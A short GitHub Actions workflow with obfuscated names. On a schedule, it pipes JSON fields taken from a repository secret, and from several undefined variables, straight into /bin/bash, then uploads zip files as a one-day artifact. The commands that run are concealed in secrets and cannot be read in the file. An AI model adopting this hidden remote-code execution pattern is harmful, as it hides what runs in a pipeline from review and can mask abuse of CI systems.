name: yuyizhaoshou
on:
  workflow_dispatch:

  schedule:
    - cron: '1 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuyizhaoshou
        env:
          o93: ${{ secrets.o93 }}
        run: |
          printf '%s' "$o93" | jq -r .jdzai94234 | /bin/bash
          echo $q54410 | jq -r .co8291 | /bin/bash
          printf '%s' "$ah81" | jq -r .hs1 | /bin/bash
          printf '%s' "$up71" | jq -r .xilnk8 | /bin/bash
          printf '%s' "$nnfns8" | jq -r .ouau86 | /bin/bash
          echo $sttf6244 | jq -r .qcyjj3 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 3TLojmEy
          path: "*.zip"
          retention-days: 1
